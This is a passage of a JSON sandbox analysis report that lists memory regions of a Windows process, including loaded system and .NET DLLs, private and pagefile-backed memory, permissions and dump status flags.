"ref_process_dump": null, "size": 1605632, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 9207807, "entry_point": 0, "filename": null, "id": "region_1257", "name": "pagefile_0x0000000000740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7602176, "timestamp": "00:00:58.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1258", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:58.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1259", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:00:58.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1260", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:00:58.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1261", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:00:58.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1262", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:00:58.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1263", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:00:58.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1264", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:00:58.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1266", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:58.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1267", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:58.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9240576, "type": "region", "version": 1 }, "end_va": 10817535, "entry_point": 0, "filename": null, "id": "region_1268", "name": "pagefile_0x00000000008d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9240576, "timestamp": "00:00:58.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 18415616, "type": "region", "version": 1 }, "end_va": 39387135, "entry_point": 0, "filename": null, "id": "region_1269", "name": "pagefile_0x0000000001190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18415616, "timestamp": "00:00:58.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6889472, "start_va": 1789526016, "type": "region", "version": 1 }, "end_va": 1796415487, "entry_point": 1789526016, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", "id": "region_1270", "name": "clr.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll", "region_type": "memory_mapped_file", "start_va": 1789526016, "timestamp": "00:00:58.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 864256, "start_va": 1857290240, "type": "region", "version": 1 }, "end_va": 1858154495, "entry_point": 1857290240, "filename": "\\Windows\\SysWOW64\\msvcr110_clr0400.dll", "id": "region_1271", "name": "msvcr110_clr0400.dll", "norm_filename": "c:\\windows\\syswow64\\msvcr110_clr0400.dll", "region_type": "memory_mapped_file", "start_va": 1857290240, "timestamp": "00:00:58.492", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1272", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:00:58.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_1273", "name": "pagefile_0x0000000000080000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 524288, "timestamp": "00:00:58.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 655359, "entry_point": 0, "filename": null, "id": "region_1274", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:00:58.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_1275", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:00:58.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_1276", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:58.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_1277", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:00:58.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_1278", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:00:58.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_1279", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:00:58.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_1280", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:00:58.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 5177343, "entry_point": 0, "filename": null, "id": "region_1281", "name": "private_0x00000000004b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4915200, "timestamp": "00:00:58.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 655360, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6684671, "entry_point": 0, "filename": null, "id": "region_1282", "name": "private_0x00000000005c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6029312, "timestamp": "00:00:58.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 7274495, "entry_point": 0, "filename": null, "id": "region_1283", "name": "private_0x00000000006b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7012352, "timestamp": "00:00:58.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11075584, "type": "region", "version": 1 }, "end_va": 11337727, "entry_point": 0, "filename": null, "id": "region_1284", "name": "private_0x0000000000a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 11075584, "timestamp": "00:00:58.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11403264, "type": "region", "version": 1 }, "end_va": 11665407, "entry_point": 0, "filename": null, "id": "region_1285", "name": "private_0x0000000000ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11403264, "timestamp": "00:00:58.999", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 11796480, "type": "region", "version": 1 }, "end_va": 12845055, "entry_point": 0, "filename": null, "id": "region_1286", "name": "private_0x0000000000b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 11796480, "timestamp": "00:00:59.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 12845056, "type": "region", "version": 1 }, "end_va": 13107199, "entry_point": 0, "filename": null, "id": "region_1287", "name": "private_0x0000000000c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 12845056, "timestamp": "00:00:59.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 13303808, "type": "region", "version": 1 }, "end_va": 14352383, "entry_point": 0, "filename": null, "id": "region_1288", "name": "private_0x0000000000cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 13303808, "timestamp": "00:00:59.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 14876672, "type": "region", "version": 1 }, "end_va": 15925247, "entry_point": 0, "filename": null, "id": "region_1289", "name": "private_0x0000000000e30000", "norm_filename": null, "region_type": "private_memory", "start_va": 14876672, "timestamp": "00:00:59.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 72941567, "entry_point": 0, "filename": null, "id": "region_1290", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:00:59.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 72941568, "type": "region", "version": 1 }, "end_va": 75886591, "entry_point": 72941568, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1291", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 72941568, "timestamp": "00:00:59.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 16510976, "start_va": 1840775168, "type": "region", "version": 1 }, "end_va": 1857286143, "entry_point": 1840775168, "filename": "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\51e2934144ba15628ba5a31be2dae7dc\\mscorlib.ni.dll", "id": "region_1292", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\51e2934144ba15628ba5a31be2dae7dc\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1840775168, "timestamp": "00:00:59.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_1293", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:00:59.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_1294", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:00:59.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1295", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:59.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1296", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:00:59.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1943732224, "type": "region", "version": 1 }, "end_va": 1944256511, "entry_point": 1943812041, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1297", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1943732224, "timestamp": "00:00:59.034", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001298-addr_0x0000000000f30000-size_0x0000000000170000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_340", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1507328, "start_va": 15925248, "type": "region", "version": 1 }, "end_va": 17432575, "entry_point": 0, "filename": null, "id": "region_1298", "name": "private_0x0000000000f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 15925248, "timestamp": "00:00:59.035", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 15925248, "type": "region", "version": 1 }, "end_va": 16838655, "entry_point": 0, "filename": null, "id": "region_1299", "name": "pagefile_0x0000000000f30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 15925248, "timestamp": "00:00:59.037", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 17170432, "type": "region", "version": 1 }, "end_va": 17432575, "entry_point": 0, "filename": null, "id": "region_1300", "name": "private_0x0000000001060000", "norm_filename": null, "region_type": "private_memory", "start_va": 17170432, "timestamp": "00:00:59.037", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_1301", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:00:59.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 450560, "start_va": 1840316416, "type": "region", "version": 1 }, "end_va": 1840766975, "entry_point": 1840316416, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", "id": "region_1302", "name": "clrjit.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll", "region_type": "memory_mapped_file", "start_va": 1840316416, "timestamp": "00:00:59.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_1303", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:01:00.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 0, "filename": null, "id": "region_1304", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:01:00.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12701696, "start_va": 1815937024, "type": "region", "version": 1 }, "end_va": 1828638719, "entry_point": 1815937024, "filename": "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\22ae167d586450ad3a9b9a9ee43ebc86\\System.Windows.Forms.ni.dll", "id": "region_1305", "name": "system.windows.forms.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\22ae167d586450ad3a9b9a9ee43ebc86\\system.windows.forms.ni.dll", "region_type": "memory_mapped_file", "start_va": 1815937024, "timestamp": "00:01:00.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1642496, "start_va": 1828651008, "type": "region", "version": 1 }, "end_va": 1830293503, "entry_point": 1828651008, "filename": "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\72269ea7cc6281139e4d155e7c57dc67\\System.Drawing.ni.dll", "id": "region_1306", "name": "system.drawing.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\72269ea7cc6281139e4d155e7c57dc67\\system.drawing.ni.dll", "region_type": "memory_mapped_file", "start_va": 1828651008, "timestamp": "00:01:00.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9932800, "start_va": 1830354944, "type": "region", "version": 1 }, "end_va": 1840287743, "entry_point": 1830354944, "filename": "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\e40da7a49f8c3f0108e7c835b342f382\\System.ni.dll", "id": "region_1307", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\e40da7a49f8c3f0108e7c835b342f382\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1830354944, "timestamp": "00:01:00.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7004160, "start_va": 1808924672, "type": "region", "version": 1 }, "end_va": 1815928831, "entry_point": 1808924672, "filename": "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\b9f7adbc90a2bcbe8eb9e6e8d2bb975b\\System.Core.ni.dll", "id": "region_1308", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\b9f7adbc90a2bcbe8eb9e6e8d2bb975b\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 1808924672, "timestamp": "00:01:01.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941241856, "type": "region", "version": 1 }, "end_va": 1941315583, "entry_point": 1941241856, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll", "id": "region_1309", "name": "nlssorting.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll", "region_type": "memory_mapped_file", "start_va": 1941241856, "timestamp": "00:01:01.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2957312, "start_va": 75890688, "type": "region", "version": 1 }, "end_va": 78847999, "entry_point": 75890688, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp", "id": "region_1310", "name": "sortdefault.nlp", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp", "region_type": "memory_mapped_file", "start_va": 75890688, "timestamp": "00:01:01.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1941110784, "type": "region", "version": 1 }, "end_va": 1941204991, "entry_point": 1941110784, "filename": "\\Windows\\SysWOW64\\bcrypt.dll", "id": "region_1311", "name": "bcrypt.dll", "norm_filename": "c:\\windows\\syswow64\\bcrypt.dll", "region_type": "memory_mapped_file", "start_va": 1941110784, "timestamp": "00:01:01.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4808704, "start_va": 1804075008, "type": "region", "version": 1 }, "end_va": 1808883711, "entry_point": 1804075008, "filename": "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", "id": "region_1312", "name": "system.windows.forms.dll", "norm_filename": "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll", "region_type": "memory_mapped_file", "start_va": 1804075008, "timestamp": "00:01:01.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4595711, "entry_point": 0, "filename": null, "id": "region_1313", "name": "pagefile_0x0000000000460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4587520, "timestamp": "00:01:01.921", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 532480, "start_va": 78905344, "type": "region", "version": 1 }, "end_va": 79437823, "entry_point": 78905344, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1314", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 78905344, "timestamp": "00:01:02.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 532480, "start_va": 78905344, "type": "region", "version": 1 }, "end_va": 79437823, "entry_point": 78911913, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1315", "name": "comctl32.dll", "norm_filename": 